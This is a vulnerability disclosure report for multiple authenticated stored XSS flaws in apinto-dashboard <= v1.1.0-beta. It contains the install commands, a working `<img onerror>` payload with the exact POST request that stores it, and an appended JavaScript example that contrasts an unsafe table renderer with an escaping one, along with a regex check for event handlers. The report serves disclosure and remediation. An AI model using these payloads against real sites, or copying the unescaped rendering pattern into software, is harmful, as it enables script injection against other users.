Submit #50340: apinto-dashboard Multiple authenticated stored XSS in apinto-dashboard <= v1.1.0-beta

Title: apinto-dashboard Multiple authenticated stored XSS in apinto-dashboard <= v1.1.0-beta
Description:

repo: https://github.com/eolinker/apinto-dashboard

1. Download and unzip the installation package Apinto
2. Start the gateway
3. Download and unzip the installation package Apinto Dashboard
4. Start Apinto Dashboard

```bash
# Gateway: fetch, unpack and start Apinto v0.8.0
wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto
./apinto start
cd ..
# Dashboard: fetch, unpack and start apinto-dashboard v1.1.0-beta
wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard
./apinto-dashboard
```

This problem exists in most pages with tables. For example, on the /discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description. Then click Details to trigger.

Request URL: /api/discoveries/
Request Method: POST
PostData: `{"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"}`

![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png)
![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png)
![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png)
![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png)

Reported by Neppah (@Tomy) from QSec-Team of the Cyber Security Department at Qi'anxin Group on 2022-11-01.
User: Tomy (UID 34751)
Submitted: 01.11.2022 12:09 (4 years ago)
Moderated: 01.11.2022 16:47 (5 hours later)
Status: Accepted
VulDB Entry: 212639 [eolinker apinto-dashboard /api/discoveries/ Cross Site Scripting]
Points: 17
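The defect class the report describes, shown as an added example that is not apinto-dashboard code (the dashboard's real front end is not reproduced here, and the page does not say which rendering sink it uses): the record from the report's PostData is pushed through a row renderer that interpolates fields into markup unescaped, the sink pattern behind a stored XSS of this kind, and through a hardened renderer that HTML-escapes every untrusted field at output time. The `containsActiveMarkup` check is a regression test a practitioner could run over rendered rows; the record copy, the function names and the regex are assumptions for illustration.

```javascript
// Added example (not apinto-dashboard code). Constructed copy of the record
// the report posts to /api/discoveries/; both fields carry an <img onerror> payload.
const submittedRecord = {
  health_on: false,
  name: "1<img src=1 onerror=alert(111)>",
  driver: "static",
  description: "<img src=1 onerror=alert(222)>",
};

// Escape the five characters that can change HTML context. Quotes are included
// so the same helper is safe inside attribute values, not only text nodes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: stored fields dropped straight into the table markup.
// Anything the user saved as name/description becomes live HTML on view.
function renderRowUnsafe(record) {
  return `<tr><td>${record.name}</td><td>${record.driver}</td><td>${record.description}</td></tr>`;
}

// Hardened pattern: identical layout, every untrusted field escaped at the sink.
function renderRowSafe(record) {
  return `<tr><td>${escapeHtml(record.name)}</td><td>${escapeHtml(record.driver)}</td><td>${escapeHtml(record.description)}</td></tr>`;
}

// Regression check for rendered output: a tag that still carries an on* event
// handler attribute means user data reached the page as markup, not text.
const ACTIVE_MARKUP = /<[a-z][^>]*\bon[a-z]+\s*=/i;
function containsActiveMarkup(html) {
  return ACTIVE_MARKUP.test(html);
}

// Stand-alone run: compare both renderers on the reported payload.
console.log("unsafe row has live handler:", containsActiveMarkup(renderRowUnsafe(submittedRecord)));
console.log("safe row has live handler:  ", containsActiveMarkup(renderRowSafe(submittedRecord)));
console.log(renderRowSafe(submittedRecord));
```

Escaping at the output sink rather than on input is what makes the fix hold across "most pages with tables": a stored record is rendered in many places, and a single escaping renderer covers all of them, whereas input filtering has to anticipate every later context. The check only looks for inline event handlers, which is enough for the payload in this report but not a general XSS detector.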
